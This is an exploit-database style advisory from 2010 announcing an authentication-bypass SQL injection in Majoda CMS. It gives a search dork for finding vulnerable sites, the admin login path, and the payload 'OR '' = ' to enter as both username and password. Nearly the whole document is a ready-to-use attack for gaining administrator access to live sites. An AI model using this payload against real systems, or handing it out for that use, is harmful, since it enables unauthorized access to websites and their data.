# Exploit Title: Majoda CMS (Auth Bypass) SQL Injection Vulnerability # Date: 2010-02-28 # Author: Phenom # Software Link: # Version: # Tested on: windows xp sp3 # CVE : # Code : ------------------------------------------------------ ------------------------------------------------------ _____ _ | __ | | | |__) | |__ ___ _ __ ___ _ __ ___ | ___/| '_ / _ '_ / _/| '_ ` _ | | | | | | __/ | | | (_) | | | | | | |_| |_| |_|___|_| |_|/__/|_| |_| |_| ------------------------------------------------------ ------------------------------------------------------ ############### Majoda CMS (Auth Bypass) SQL Injection Vulnerability ########################## # # Author : Phenom # # mail : sys.phenom.sys[at]gmail[dot]com # # Dork : Majoda CMS #################### ####### Exploit ################## # # http://site/admin/index.asp # # Anvndarnamn(Username) : 'OR '' = ' # Lsenord(password) : 'OR '' = ' # #################